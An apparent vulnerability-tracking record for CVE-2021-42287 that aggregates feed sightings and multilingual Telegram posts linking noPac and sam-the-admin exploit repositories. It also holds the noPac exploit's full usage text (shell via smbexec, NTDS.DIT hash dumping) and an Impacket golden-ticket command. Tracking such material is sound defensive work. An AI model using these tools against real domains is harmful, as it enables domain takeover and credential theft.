{"vulnerability": "CVE-2021-42287", "sightings": [{"uuid": "810a8f56-7ae5-4083-ada5-423155d53eb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "MISP/99138053-ae5d-4bcf-b2f8-0954edb204bc", "content": "", "creation_timestamp": "2022-11-01T20:54:34.000000Z"}, {"uuid": "6f391940-386e-449d-8106-628022d5fdb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "MISP/095ab3f1-cbae-4b5c-8534-34d42a458aa5", "content": "", "creation_timestamp": "2022-05-12T16:19:54.000000Z"}, {"uuid": "8a13b9b6-d88b-4d70-abd9-3afb4a4e4c52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "MISP/aaf97b2c-ad16-4ce6-928a-a440112d0fd3", "content": "", "creation_timestamp": "2024-09-16T19:13:31.000000Z"}, {"uuid": "0430372c-e935-473f-a373-ec14d8aa76e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "008070c8-83f7-4a61-84f3-aa00790c9efa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971507", "content": "", "creation_timestamp": "2024-12-24T20:30:21.498791Z"}, {"uuid": "d023e5f6-36ec-496f-9d9f-a8eedd74f84f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-7358d820-9e7295ee585c5d83", "content": "", "creation_timestamp": "2025-04-30T17:58:26.900498Z"}, {"uuid": "12459bb7-94c0-41c3-9182-bb9fd9d96a1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:32.000000Z"}, {"uuid": "2f7325b3-1b12-4ec8-9e2a-84f01f6f5f11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "09a7ba63-8182-47c5-9efc-f85bd4323d84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1116", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \nURL\uff1ahttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2021-12-16T14:49:25.000000Z"}, {"uuid": "198f7c92-0e57-44b3-bc63-fccd6baf788d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-42287", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/5cd55247-d2e3-4d95-8e4c-62b0be09855f", "content": "", "creation_timestamp": "2026-02-02T12:27:52.455694Z"}, {"uuid": "d30c66e1-3485-4ae7-88ff-a6d538e9742d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/habr_com_news/2245", "content": "\u200bMicrosoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e \u0431\u0430\u0433\u0430\u0445 Active Directory, \u0441 \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u0435\u043d \u0437\u0430\u0445\u0432\u0430\u0442 \u0434\u043e\u043c\u0435\u043d\u0430 Windows\n\n9 \u043d\u043e\u044f\u0431\u0440\u044f 2021 \u0433\u043e\u0434\u0430 \u0431\u044b\u043b\u0438 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u044b 2 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: CVE-2021-42278 \u0438 CVE-2021-42287, \u0430 12 \u0434\u0435\u043a\u0430\u0431\u0440\u044f \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430 \u0441\u0445\u0435\u043c\u0430 \u0432\u0437\u043b\u043e\u043c\u0430. \u042d\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0432\u044f\u0437\u043a\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0440\u043e\u043b\u044c \u0434\u043e\u043c\u0435\u043d-\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0434\u043e\u043c\u0435\u043d\u043e\u043c. 20 \u0434\u0435\u043a\u0430\u0431\u0440\u044f Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u043f\u043e \u043d\u0430\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432.\n\n#Microsoft #Windows #\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c", "creation_timestamp": "2021-12-22T04:19:44.000000Z"}, {"uuid": "27134e2c-e389-420a-8bf1-da4fe7ddb26a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1242", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDetection script for CVE-2021-42278 and CVE-2021-42287\nURL\uff1ahttps://github.com/cybersecurityworks553/noPac-detection", "creation_timestamp": "2021-12-27T13:13:28.000000Z"}, {"uuid": "cebda512-f824-4bb4-a26c-c35a6fc1fe72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1009", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \nURL\uff1ahttps://github.com/Ridter/noPac", "creation_timestamp": "2021-12-13T10:29:48.000000Z"}, {"uuid": "8e8040c6-b666-498f-85e4-e42a9864ea4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/952", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-42287/CVE-2021-42278 Scanner & Exploiter.\nURL\uff1ahttps://github.com/cube0x0/noPac", "creation_timestamp": "2021-12-11T19:44:35.000000Z"}, {"uuid": "1c07bdc6-fbca-492a-9fee-137bcd241e85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1021", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploiting CVE-2021-42278 and CVE-2021-42287\nURL\uff1ahttps://github.com/waterrr/noPac", "creation_timestamp": "2021-12-13T15:27:32.000000Z"}, {"uuid": "0266fd59-5ff8-4625-8d24-77cf9e1be291", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/secmedia/81", "content": "\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u043e \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 ( CVE-2021-42287 \u0438 CVE-2021-42278 ) \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432 Active Directory, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0434\u043e\u043c\u0435\u043d\u0430\u043c\u0438 Windows.", "creation_timestamp": "2021-12-22T14:51:36.000000Z"}, {"uuid": "e4f606f3-8998-4813-93ad-f3c45dc27e3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/cKure/8415", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 noPac: CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter. Yet another low effort domain user to domain admin exploit.\nIf a Domain Controller is vulnerable it will return a TGT without a PAC, all eyes on small size tickets.\n\nhttps://github.com/cube0x0/noPac", "creation_timestamp": "2021-12-13T18:21:34.000000Z"}, {"uuid": "28e9ed5b-6232-4c14-a96a-0ff0b9658fd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/ggfcvj/3004", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T08:37:30.000000Z"}, {"uuid": "f2876cce-d4c8-4982-b6f7-b6d72b75409c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/1108", "content": "noPac - Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User\nhttp://www.kitploit.com/2022/09/nopac-exploiting-cve-2021-42278-and-cve.html", "creation_timestamp": "2022-09-06T14:17:31.000000Z"}, {"uuid": "21609afe-3ff3-41c0-8f27-7f19e152459e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/b4ckc0nn3ct/31", "content": "#activedirectory #ad #pentest #windows\nSAM THE ADMIN\n\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435\n\u0423\u0441\u043b\u043e\u0432\u0438\u044f \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0438:\n1. \u041e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u043f\u0430\u0442\u0447\u0430 \u043d\u0430 CVE-2021-42278\n2. \u0423\u0447\u0435\u0442\u043a\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0441 \u043f\u0440\u0430\u0432\u043e\u043c \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u043e\u0432 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\n\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n\n\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c Pachine\n\u0410\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b:\nnoPac.py\nnoPac.exe\nsam-the-admin", "creation_timestamp": "2023-05-21T04:48:36.000000Z"}, {"uuid": "a5d903ac-0fa2-4cd0-8aea-f23136e83730", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/NinjaSec/348", "content": "Offensive Security (for exams like OSCP, OSWE, OSEP, etc.). \n\n\nPowerful Offensive Security Tools\n\n1. DeathStar \u2013 Automated AD privilege escalation\nhttps://github.com/byt3bl33d3r/DeathStar\n\n\n2. Frogger \u2013 Lateral movement visualizer for BloodHound\nhttps://github.com/FSecureLABS/Frogger\n\n\n3. InSpy \u2013 LinkedIn-based OSINT tool for target enumeration\nhttps://github.com/leapsecurity/InSpy\n\n\n4. NoPac-Tool \u2013 Exploits CVE-2021-42287 & CVE-2021-42278 (Kerberos)\nhttps://github.com/Ridter/noPac\n\n\n5. LaZagne \u2013 Credential recovery from local machines\nhttps://github.com/AlessandroZ/LaZagne\n\n\n6. Egress-Assess \u2013 Test outbound firewall egress rules\nhttps://github.com/FortyNorthSecurity/Egress-Assess\n\n\n7. SessionGopher \u2013 Gathers saved session data\nhttps://github.com/fireeye/SessionGopher\n\n\n8. RustScan \u2013 Lightning-fast modern port scanner\nhttps://github.com/RustScan/RustScan\n\n\n9. Grouper2 \u2013 Active Directory ACL auditing\nhttps://github.com/l0ss/Grouper2\n\n\n10. ADACLScanner \u2013 Find misconfigured ACLs in AD\nhttps://github.com/canix1/ADACLScanner\n\n\n11. CredNinja \u2013 Brute-forces AD credentials over SMB\nhttps://github.com/byt3bl33d3r/CredNinja\n\n\n12. PetitPotam \u2013 Coerce NTLM authentication via MS-EFSRPC\nhttps://github.com/topotam/PetitPotam\n\n\n13. ZAP CLI \u2013 Command-line tool for OWASP ZAP automation\nhttps://github.com/Grunny/zap-cli\n\n\n14. Brutespray \u2013 Combines Nmap and Hydra for bruteforcing\nhttps://github.com/x90skysn3k/brutespray\n\n\n15. Chankro \u2013 DLL sideloading helper tool\nhttps://github.com/ivan-sincek/chankro\n\n\n16. 0d1n \u2013 Web application brute-forcing tool\nhttps://github.com/danielmiessler/0d1n\n\n\n17. Silenthound \u2013 BloodHound alternative using .NET\nhttps://github.com/dievus/silenthound\n\n\n18. LDAPDomainDump \u2013 Dumps Active Directory info via LDAP\nhttps://github.com/dirkjanm/ldapdomaindump\n\n\n19. SharpView \u2013 AD enumeration using C# (OPSEC-safe alternative to PowerView)\nhttps://github.com/tevora-threat/SharpView\n\n\n20. SharpHound.ps1 \u2013 Standalone version for stealthier BloodHound collection\nhttps://github.com/BloodHoundAD/BloodHound\n\n\n21. Nishang \u2013 PowerShell for offensive use\nhttps://github.com/samratashok/nishang\n\n\n22. PowerSharpPack \u2013 Collection of PowerShell offensive tools\nhttps://github.com/S3cur3Th1sSh1t/PowerSharpPack\n\n\n23. EvilClippy \u2013 Weaponize MS Office documents\nhttps://github.com/outflanknl/EvilClippy\n\n\n24. PSAttack \u2013 PowerShell attack toolkit\nhttps://github.com/jaredhaight/PSAttack\n\n\n25. Praeda \u2013 Collects sensitive info from embedded devices\nhttps://github.com/percx/Praeda\n\n\n#HackersFactory", "creation_timestamp": "2025-06-20T22:08:37.000000Z"}, {"uuid": "bedcdcf6-7919-4123-bc0b-457dee4ecc90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/1110", "content": "Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user  Changed from sam-the-admin (https://github.com/WazeHell/sam-the-admin).\n  Usage  SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain\n\npositional arguments:\n  [domain/]username[:password]\n                        Account used to authenticate to DC.\n\noptional arguments:\n  -h, --help            show this help message and exit\n  --impersonate IMPERSONATE\n                        target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is allowed for delegation to the SPN specified\n  -domain-netbios NETBIOSNAME\n                        Domain NetBIOS name. Required if the DC has multiple domains.\n  -target-name NEWNAME  Target computer name, if not specified, will be random generated.\n  -new-pass PASSWORD    Add new computer password, if not specified, will be random generated.\n  -old-pass PASSWORD    Target computer password, use if you know the password of the target you input with -target-name.\n  -ol   d-hash LMHASH:NTHASH\n                        Target computer hashes, use if you know the hash of the target you input with -target-name.\n  -debug                Turn DEBUG output ON\n  -ts                   Adds timestamp to every logging output\n  -shell                Drop a shell via smbexec\n  -no-add               Forcibly change the password of the target computer.\n  -create-child         Current account have permission to CreateChild.\n  -dump                 Dump Hashs via secretsdump\n  -use-ldap             Use LDAP instead of LDAPS\n\nauthentication:\n  -hashes LMHASH:NTHASH\n                        NTLM hashes, format is LMHASH:NTHASH\n  -no-pass              don't ask for password (useful for -k)\n  -k                    Use Kerberos (https://www.kitploit.com/search/label/Kerberos) authentication. Grabs credentials (https://www.kitploit.com/search/label/Credentials) from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line\n  -aesKey hex key       AES key to use for Kerberos Authentication (https://www.kitploit.com/search/label/Authentication) (128 or 256 bits)\n  -dc-host hostname     Hostname of the domain controller (https://www.kitploit.com/search/label/Domain%20Controller) to use. If ommited, the domain part (FQDN) specified in the account parameter will be used\n  -dc-ip ip             IP of the domain controller to use. Useful if you can't translate the FQDN.specified in the account parameter will be used\n\nexecute options:\n  -port [destination port]\n                        Destination port to connect to SMB Server\n  -mode {SERVER,SHARE}  mode to use (default SHARE, SERVER needs root!)<   br/>  -share SHARE          share where the output will be grabbed from (default ADMIN$)\n  -shell-type {cmd,powershell}\n                        choose a command processor for the semi-interactive shell\n  -codec CODEC          Sets encoding (https://www.kitploit.com/search/label/Encoding) used (codec) from the target's output (default \"GBK\").\n  -service-name service_name\n                        The name of theservice used to trigger the payload\n\ndump options:\n  -just-dc-user USERNAME\n                        Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch\n  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)\n  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)\n  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data\n  -use   r-status          Display whether or not the user is disabled\n  -history              Dump password history, and LSA secrets OldVal\n  -resumefile RESUMEFILE", "creation_timestamp": "2022-09-06T14:17:32.000000Z"}, {"uuid": "9a5a69f9-39b8-40ff-a747-671df20849df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3883", "content": "\ud83c\udfab\u041d\u0435\u043c\u043d\u043e\u0433\u043e \u043e Golden Ticket\ud83c\udfab\n\n\u0418\u0437\u0443\u0447\u0430\u044f \u0440\u0435\u0441\u0443\u0440\u0441\u044b \u043f\u043e \u0442\u0438\u043f\u0443 HackTricks, \u0432\u044b \u043c\u043e\u0433\u043b\u0438 \u043d\u0435\u043e\u0434\u043d\u043e\u043a\u0440\u0430\u0442\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0441\u043f\u043e\u0441\u043e\u0431 \u0432\u044b\u0434\u0430\u0447\u0438 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0437\u043e\u043b\u043e\u0442\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 ticketer.py \u0438\u0437 \u043d\u0430\u0431\u043e\u0440\u0430 Impacket\ud83d\udc69\u200d\ud83d\udcbb:\npython3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser\n\n\u041d\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0432 \u0441\u0435\u0431\u0435 \u0431\u0438\u043b\u0435\u0442 \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043f\u0440\u0438 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u044b \u0443\u0432\u0438\u0434\u0438\u0442\u0435 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443:\n[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)\n\u041e \u0447\u0435\u043c \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u044d\u0442\u0430 \u043e\u0448\u0438\u0431\u043a\u0430? \u0411\u0438\u043b\u0435\u0442 \u0431\u044b\u043b \u043e\u0442\u043e\u0437\u0432\u0430\u043d? \u041d\u043e \u043c\u044b \u0436\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u043e \u0435\u0433\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438!\n\n\u0412\u0441\u044f \u043f\u0440\u0438\u0447\u0438\u043d\u0430 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043a\u0442\u043e-\u0442\u043e \u043d\u0435 \u0441\u043b\u0435\u0434\u0438\u0442 \u0437\u0430 \u043f\u0430\u0442\u0447-\u043d\u043e\u0443\u0442\u0430\u043c\u0438. \u0421 \u043d\u043e\u044f\u0431\u0440\u044f 2021 \u0433\u043e\u0434\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u043d\u0430\u0447\u0430\u043b\u0430 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 KB5008380, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0432\u043e\u0434\u0438\u043b\u043e\u0441\u044c \u0432 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u044d\u0442\u0430\u043f\u043e\u0432. \u0415\u0433\u043e \u0446\u0435\u043b\u044c\u044e \u0431\u044b\u043b\u0430 \u043d\u0435\u0439\u0442\u0440\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-42287, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0431\u0435\u0437 \u043e\u0441\u043e\u0431\u044b\u0445 \u0443\u0441\u0438\u043b\u0438\u0439 \u043e\u043b\u0438\u0446\u0435\u0442\u0432\u043e\u0440\u044f\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430, \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u044f\u044f Privilege Attribute Certificate (PAC) Kerberos\ud83d\uddbc\ufe0f\n\n\u0414\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u043d\u0435 \u0432 \u0442\u0435\u043c\u0435:\nPrivilege Attribute Certificate (PAC) \u2014 \u044d\u0442\u043e \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Kerberos, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0445\u0440\u0430\u043d\u0438\u0442 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u043f\u0440\u0438\u043a\u0440\u0435\u043f\u043b\u044f\u0435\u0442\u0441\u044f \u043a \u0431\u0438\u043b\u0435\u0442\u0443 Kerberos, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0447\u043b\u0435\u043d\u0441\u0442\u0432\u0435 